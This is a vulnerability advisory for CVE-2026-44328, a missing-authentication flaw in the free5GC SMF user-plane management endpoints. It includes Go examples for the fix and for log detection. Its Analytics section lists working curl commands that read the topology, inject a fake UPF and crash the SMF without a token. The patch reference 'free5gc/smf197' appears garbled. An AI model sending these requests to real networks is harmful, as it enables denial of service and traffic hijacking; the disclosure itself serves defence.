free5GC’s Session Management Function (SMF) exposes the User Plane Information (UPI) management route group without OAuth2/bearer-token authorization middleware. A network attacker who can reach the SMF on its Service-Based Interface (SBI) can call UPI endpoints directly without any `Authorization` header, and the unauthenticated requests reach the SMF business handlers. The defect is route-group-scoped: the UPI group is mounted without inbound auth middleware, while the sibling `nsmf-oam` group on the same SMF instance returns `401 Unauthorized` for token-less requests, which shows that OAuth2 middleware is wired in for other groups but not for UPI. Code evidence shows the UPI group mounted without auth middleware at `NFs/smf/internal/sbi/server.go:76` and `:78`, whereas the OAM group uses auth at `server.go:99` and `:105`. The vulnerable handlers are implemented in `api_upi.go:44`, `:60`, and `:84` for the read, write, and delete operations respectively. In the DELETE handler (`api_upi.go:94` and `:99`), the code unconditionally calls `upNode.UPF.CancelAssociation()` after mutating the topology, even for AN-typed nodes that are constructed without a UPF object, leading to a nil-pointer dereference and a crash. The panic occurs after the topology mutation has already landed, causing both denial of service and state corruption. The vulnerability is present in free5GC v4.2.1 and has been assigned CVE-2026-44328 with a High severity.
dailycve form:
Platform: free5GC SMF
Version: v4.2.1
Vulnerability: missing auth
Severity: High
Date: 2026-03-13
Prediction: 2026-03-22
Analytics
The vulnerability manifests as two separate flaws: (1) complete lack of OAuth2 middleware on the entire UPI route group, and (2) an unconditional nil-pointer dereference in the DELETE handler that follows the topology mutation. By comparing logs between the UPI and OAM groups, analysts can quickly identify the missing auth boundary. The following commands can be used to probe an SMF instance:
```shell
# Check OAM (should be protected)
curl -i http://<SMF_IP>:8000/nsmf-oam/v1/

# Check UPI read (vulnerable)
curl -i http://<SMF_IP>:8000/upi/v1/upNodesLinks

# Inject fake UPF entry (vulnerable)
curl -i -X POST http://<SMF_IP>:8000/upi/v1/upNodesLinks \
  -H 'Content-Type: application/json' \
  --data '{"links":[{"A":"gNB1","B":"FAKE-UPF","weight":1}],"upNodes":{"FAKE-UPF":{"type":"UPF","nodeID":"198.51.100.20","addr":"198.51.100.20","sNssaiUpfInfos":[{"sNssai":{"sst":1,"sd":"010203"},"dnnUpfInfoList":[{"dnn":"internet"}]}]}}}'

# Delete any node (vulnerable)
curl -i -X DELETE http://<SMF_IP>:8000/upi/v1/upNodesLinks/FAKE-UPF

# Delete AN node to trigger panic (vulnerable)
curl -i -X DELETE http://<SMF_IP>:8000/upi/v1/upNodesLinks/gNB1
```
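The route-group mount error described above, reduced to a minimal standard-library illustration (added example, not free5GC's code; `requireBearer`, `newSMFMux` and `probe` are assumed names, and the middleware here accepts any `Bearer` value rather than validating a real OAuth2 token). With `protectUPI=false` the mux behaves like the vulnerable SMF: OAM rejects token-less requests while UPI does not; with `protectUPI=true` both groups sit behind the same middleware, which is the shape of the fix.

```go
package main

import (
	"net/http"
	"net/http/httptest"
	"strings"
)

// requireBearer stands in for the SBI OAuth2 middleware. Assumption for this
// illustration: any "Bearer ..." header is accepted; real code validates it.
func requireBearer(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		if !strings.HasPrefix(r.Header.Get("Authorization"), "Bearer ") {
			http.Error(w, "missing or invalid token", http.StatusUnauthorized)
			return
		}
		next.ServeHTTP(w, r)
	})
}

// newSMFMux mounts two route groups the way the advisory describes. With
// protectUPI=false the UPI group is reachable with no token (the defect);
// with protectUPI=true both groups share the same inbound middleware (the fix).
func newSMFMux(protectUPI bool) http.Handler {
	ok := http.HandlerFunc(func(w http.ResponseWriter, _ *http.Request) { w.WriteHeader(http.StatusOK) })
	mux := http.NewServeMux()
	mux.Handle("/nsmf-oam/v1/", requireBearer(ok)) // OAM group: auth wired in
	if protectUPI {
		mux.Handle("/upi/v1/", requireBearer(ok)) // UPI group: now protected
	} else {
		mux.Handle("/upi/v1/", ok) // UPI group: mounted without middleware
	}
	return mux
}

// probe issues one request and returns the status code, like the curl checks above.
func probe(h http.Handler, method, path, token string) int {
	req := httptest.NewRequest(method, path, nil)
	if token != "" {
		req.Header.Set("Authorization", "Bearer "+token)
	}
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}
```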
What Undercode Say:
“No token? No problem—for the UPI group, that’s exactly the design. The missing middleware turns the SMF’s user-plane management into an open door for any attacker who can reach the SBI. This isn’t a configuration glitch; it’s a fundamental route‑group mount error that leaves the entire UPI surface unprotected. Coupled with the unsafe nil dereference in the DELETE handler, a single unauthenticated request can crash the SMF while corrupting the topology it manages.”
Exploit
An attacker with network access to the SMF SBI can:
– Read the current UP‑node and link topology anonymously (GET /upi/v1/upNodesLinks).
– Inject attacker‑controlled UPF entries (nodeID, address, S‑NSSAI, DNN), poisoning the SMF’s view of which UPFs serve which slices/DNNs and biasing subsequent UPF selection for legitimate PDU sessions (POST /upi/v1/upNodesLinks).
– Delete any named entry via DELETE /upi/v1/upNodesLinks/{nodeID}. When deleting an AN node (e.g., gNB1), the handler crashes after mutating the topology, causing a DoS and leaving the topology in an inconsistent state.
All of the above are possible without any Authorization header and with no prior authentication.
Protection from this CVE
- Apply the official patch from `free5gc/smf197` as soon as it is available.
- Until patched, deploy a reverse proxy or API gateway in front of the SMF SBI that enforces OAuth2 validation for all requests to the `/upi/v1/` path.
- Segment the network so that only trusted 5G core functions can reach the SMF SBI port (8000).
- Monitor logs for unexpected `GET`, `POST`, or `DELETE` requests to `/upi/v1/upNodesLinks` without a valid `Authorization` header.
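The monitoring item above, as an added detection example (not free5GC's code): it scans constructed access-log lines from a proxy in front of the SBI, keeps the token-less requests that were routed under `/upi/v1/`, and labels each hit with the read, write or delete flaw it corresponds to. The column layout and the names `Finding`, `classify` and `unauthenticatedUPIRequests` are assumptions for this example.

```go
package main

import (
	"bufio"
	"strings"
)

// Constructed sample of access-log lines from a proxy in front of the SMF SBI. Column
// layout is an assumption (not free5GC's format): method path status authz ("-" = no header).
const sampleAccessLog = `GET /nsmf-oam/v1/ 401 -
GET /upi/v1/upNodesLinks 200 -
POST /upi/v1/upNodesLinks 200 -
DELETE /upi/v1/upNodesLinks/FAKE-UPF 204 -
DELETE /upi/v1/upNodesLinks/gNB1 500 -
GET /upi/v1/upNodesLinks 200 Bearer
GET /nsmf-pdusession/v1/sm-contexts 200 Bearer`

// Finding records one token-less request that was routed to the UPI group.
type Finding struct{ Method, Path, Status, Note string }

// classify maps a hit to the advisory's three flaws (read, write, delete).
func classify(method, status string) string {
	switch method {
	case "GET":
		return "topology read"
	case "POST":
		return "topology write (possible fake UPF injection)"
	case "DELETE":
		if strings.HasPrefix(status, "5") {
			return "node deletion followed by server error (possible AN-node panic)"
		}
		return "node deletion"
	}
	return "other"
}

// unauthenticatedUPIRequests returns every line under /upi/v1/ that carried no
// Authorization header; anything but 401 there means the SMF handlers ran it.
func unauthenticatedUPIRequests(log string) []Finding {
	var out []Finding
	sc := bufio.NewScanner(strings.NewReader(log))
	for sc.Scan() {
		f := strings.Fields(sc.Text())
		if len(f) < 4 || !strings.HasPrefix(f[1], "/upi/v1/") || f[3] != "-" {
			continue
		}
		out = append(out, Finding{f[0], f[1], f[2], classify(f[0], f[2])})
	}
	return out
}
```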
Impact
Missing authentication (CWE‑306) and authorization (CWE‑862) on the SMF UPI route group. An unauthenticated network attacker can read the UP‑plane topology, poison the topology with fake UPF entries, and delete arbitrary nodes—potentially causing denial of service and directing user plane traffic to attacker‑controlled UPFs. The impact is High because the vulnerable SBI is typically reachable within the 5G core network, and the write/delete capabilities allow an attacker to alter the SMF’s operational state with no prior privileges.
Sources:
Reported By: github.com